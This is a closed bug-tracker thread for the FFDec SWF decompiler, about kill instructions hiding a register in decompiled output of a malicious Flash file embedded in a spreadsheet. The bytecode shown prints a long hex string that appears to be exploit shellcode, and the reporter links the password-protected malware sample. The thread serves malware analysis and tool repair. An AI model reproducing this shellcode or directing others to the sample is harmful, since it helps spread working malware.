If you are looking for the decompiler itself, visit https://github.com/jindrapetrik/jpexs-decompiler
NEW : We have got a new blog where we post some interesting SWF internals info.
List of issues#341 Unnecessary removing setlocal (kill removes temporary registers)
Author: 
poxyran
poxyranDate created:
Type: bug
Visibility: Everybody
Assigned to: 
JPEXS
JPEXSLabels: AS3ObfuscatedSWFTools
State: closed 
Hi!, I'm analyzing a sample located at: https://sites.google.com/site/villys777/crsenvironscan.zip (pwd is
infected). It is a SWF embedded into a .xls. The thing is that when looking at bytecode
level, I see some instruction pushing a string literal but this is not reflected in the
decompiled code:
decompiled code:
{{{
[...]
_loc1_.writeInt(2.425393296E9);
_loc1_.writeInt(2.425393296E9);
_loc1_.writeBytes(hexToBin(_loc4_));
while(_loc3_ < 65536)
[...]
}}}
bytecode:
{{{
pushdouble 2.425393296E9
callpropvoid m[6]"writeInt" 1
getlocal 1
pushdouble 2.425393296E9
callpropvoid m[6]"writeInt" 1
pushstring
"141414141414141414141414141414141414141414141414141464A1300000008B400C8B701CAD8B7008E93D0
200005881EC000200008BFC89770889471090FF770868EC97030CE8CC01000089471CFF770868F622B97CE8BC0
10000894720FF770868A517007CE8AC010000894724FF770868FB97FD0FE89C010000894728FF7708681665FA1
0E88C01000089472CFF7708681F790AE8E87C010000894730FF77086825B0FFC2E86C010000894734FF770868A
C08DA76E85C010000894738FF77086898FE8A0EE84C01000089473CFF77086883B9B578E83C010000894740FF7
70868E6178F7BE82C010000894744FF770868AD9B7DDFE81C010000894748FF7710FF573433F6468D47605056F
F574883F8FF74F23D0000010076EB894704897760FF77046A40FF571C89475C6A006A006A00FF7760FF573883F
8FF744B6A008D5F7053FF7704FF775CFF7760FF572C8B4F7083E9108B475C408138432E4247750981780404068
9197404E2ECEB1A83C0088947144081384655634B750981780424048219740EE2ECFF775CFF57200F8572FFFFF
F83C0088947186A0068800000006A026A006A006800000040FF7710FF5724894764C7476C4D5A90006A008D5F7
0536A048D5F6C53FF7764FF57308B47182B471483E8088B5F1430034348434883F80075F56A008D5F70538B5F1
82B5F1483EB0853FF7714FF7764FF5730FF7764FF57286A00FF7710FF573C6A00FF57446A0050FF5740558BEC5
78B7D088B5D0C568B733C8B74337803F3568B762003F333C94941AD03C35633F60FBE1038D67408C1CE0D03F24
0EBF13BFE5E75E55A8BEB8B5A2403DD668B0C4B8B5A1C03DD8B048B03C55E5F5DC20800E8BEFDFFFF612E65786
50000"
setlocal 4
getlocal 1
findpropstrict m[5]"hexToBin"
getlocal 4
callproperty m[5]"hexToBin" 1
coerce_a
callpropvoid m[4]"writeBytes" 1
getlocal 1
}}}
_loc4_ is not showed in the decompiled code but in the bytecode.
PS: attached goes the extracted SWF file.
59d8223c01ef56de6d4724c8502592ae.swf (51 KiB)btw, here is some output from another decompiler (I don't know exactly which one, Shothink
maybe?) where you can see that _loc4_ is showed: http://pastebin.com/UscAZvCV
The problem is that FFDec handles registers deleted with kill instruction as temporary and
removes them.
For some reason in this SWF, kill instructions are called for every register.
Do you know which compiler produced the SWF file?
Assigned: → JPEXS
JPEXSno, I have no idea about the compiler used to produce this swf file. however, shothink
seems to be handling these kill instructions and shows the code anyways. Is there any
chances to add this "feature" to ffdec?.
I will think about it.
It has low priority for me as this kind of code is nonstandard and most of FFDec users
probably won't use this feature.
State: new→postponed
Title: Failed decompilation - inconsistency between bytecode and decompiled code→Unnecessary removing setlocal (kill removes temporary registers)
Assigned: → JPEXS
Assigned: →
JPEXSmmm .. well, I'm not so sure about the low priority. There are a lot of malware analyst
using ffdec and this kind of files are common in the field. Thanks!.
hmm, okay, then please send me more of such files.
check your inbox at flash@....
I am sorry for letting you wait so much without an answer and I don't think it is now
(after flash shutdown) even relevant, but
I think we fixed this in nightly build 1775.
FFDec no longer checks for kill instructions.
State: postponed→upgraded
State: upgraded→closed